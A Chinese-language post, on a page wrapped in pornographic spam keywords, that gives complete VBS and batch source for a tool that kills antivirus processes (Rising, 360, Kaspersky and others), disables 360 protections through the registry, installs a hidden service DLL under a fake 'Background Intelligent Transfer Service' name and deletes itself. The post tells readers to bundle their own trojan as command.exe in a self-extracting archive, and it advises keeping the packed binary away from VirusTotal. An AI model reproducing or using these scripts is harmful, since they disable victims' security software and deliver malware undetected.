六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

kill掉瑞星,金山,nod32,360

發(fā)表時(shí)間:2023-06-04 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]這里有到了兩個(gè)bat和兩個(gè)vbs+一個(gè)kill. 下面是源碼: setdt.vbs的源碼: set Cleaner=createobject("wscript.shell"...

這里有到了兩個(gè)bat和兩個(gè)vbs+一個(gè)kill.

下面是源碼:

setdt.vbs的源碼:

set Cleaner=createobject("wscript.shell")

Cleaner.run "setdt.bat",vbhide

.......

setdt.bat的源碼:

@ECHO OFF

@date /t>C:\time.txt

date 1988-09-18

hide.vbs

@date <C:\time.txt

del %SystemRoot%\system32\setdt.vbs

del %SystemRoot%\system32\hide.vbs

del %SystemRoot%\system32\command.exe

del %SystemRoot%\system32\xKill.exe

del %SystemRoot%\system32\xkill.bat

del C:\time.txt

del %0

..................

hide.vbs的源碼:

dim shell

set shell=CreateObject("Wscript.Shell")

WScript.Sleep 100000

shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0

set Cleaner=createobject("wscript.shell")

Cleaner.run "xkill.bat",vbhide

WScript.Sleep 100000

shell.run "cmd /c start %SystemRoot%\system32\command.exe",0

......................

xkill.bat的源碼:

@echo off

taskkill /f /im rstray.exe >NUL

taskkill /f /im 360tray.exe >NUL

taskkill /f /im 360safe.exe >NUL

echo Windows Registry Editor Version 5.00>>kill.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg

echo "MonAccess"=dword:00000000>>kill.reg

echo "SiteAccess"=dword:00000000>>kill.reg

echo "ExecAccess"=dword:00000000>>kill.reg

echo "UDiskAccess"=dword:00000000>>kill.reg

echo "LeakShowed"=dword:00000000>>kill.reg

sc create DARK binpath= %windir%\System32\darkkill.dll

sc config DARK start= disabled

echo Windows Registry Editor Version 5.00>>dark.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg

echo "Type"=dword:00000110>>dark.reg

echo "Start"=dword:00000002>>dark.reg

echo "ErrorControl"=dword:00000001>>dark.reg

echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg

echo   74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg

echo   00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg

echo   6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg

echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg

echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg

echo "DependOnGroup"=hex(7):00,00>>dark.reg

echo "ObjectName"="LocalSystem">>dark.reg

echo "Description"=hex(2):00,00>>dark.reg

echo

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg

echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg

echo   00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg

echo   72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg

echo

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg

echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg

echo   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg

echo   00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg

echo   05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg

echo   20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg

echo   00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg

echo   00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg

echo

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg

echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg

echo "Count"=dword:00000001>>dark.reg

echo "NextInstance"=dword:00000001>>dark.reg

regedit /s dark.reg

regedit /s kill.reg

COPY dark.dll %windir%\System32\darkkill.dll

sc config DARK start= AUTO

net start DARK

attrib %windir%\System32\darkkill.dll +s +h

del kill.reg

del dark.reg

del dark.dll

del dark.exe

xkill.exe

taskkill /f /im kav.exe >NUL

del %0

本人不會(huì)編程,所以只好從vbs和bat入手了,感覺還不錯(cuò).

至于xkill.exe,一個(gè)朋友給我的加殼軟件,他說這殼有后門,讓我看看能不能給去了

我迷迷糊糊的把核心部分給提取了出來,又做了免殺處理.

xkill.exe直接運(yùn)行后可以結(jié)束掉瑞星,nod32,金山,其他沒測試過.

不過還是建議你把xkill.exe和我這幾個(gè)vbs,bat一起使用,這樣還可以干掉360和卡卡,應(yīng)該還可以破壞卡巴的主動(dòng)防御

如果你問我為什么不裝個(gè)卡巴試試,那么我機(jī)子上已經(jīng)裝了5個(gè)安全軟件了,再裝個(gè)卡巴實(shí)在受不了~~

大家不要把xkill.exe上傳到殺毒網(wǎng)上試試,曾經(jīng)有一份真摯的免殺馬擺在我的面前,我沒有去珍惜.把它上傳到殺毒網(wǎng)上www.virustotal.com,結(jié)果........

這個(gè)小工具請解壓后,將你的馬復(fù)制到解壓目錄,并重命名為command.exe,然后用winrar打包生成自解壓文件,選擇解壓后運(yùn)行setdt.vbs


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。




標(biāo)簽:kill掉瑞星 金山 nod32 360 
主站蜘蛛池模板: 亚洲区欧美 | 人人公开免费超级碰碰碰视频 | 婷婷 色天使| 日韩美女网站 | 五月婷婷深爱 | 日韩中文在线观看 | 亚洲欧美日韩在线中文一 | 亚洲 欧美 清纯 丝袜 另类 | 五月激情婷婷综合 | 色黄视频| 欧美在线天堂 | 香蕉视频在线观看网址 | 亚洲第一视频网站 | 欧美亚洲日本 | 亚洲成a人v欧美综合天堂下载 | 一级做性色a爰片久久毛片免费 | 天天玩夜夜操 | 亚洲福利一区福利三区 | 亚洲成av人片在线观看 | 欧洲成品大片在线播放 | 青青草手机在线视频 | 亚洲精品网站日本xxxxxxx | 午夜h| 特级黄视频| 人人干日日操 | 亚洲狠狠婷婷综合久久久久图片 | 亚洲大尺度在线 | 亚洲综合色在线观看 | 欧美一级啪啪 | 日韩特黄特色大片免费视频 | 又粗又大又爽免费视频 | 青青青久久久 | 人九九精品 | 欧美一级黄色影片 | 一二三四免费观看在线影视大全 | 亚洲欧美日本在线观看 | 最近中文字幕无吗免费版 | 最新国产福利片在线观看 | 天天躁狠狠躁 | 日夜啪| 青青青国产精品国产精品美女 |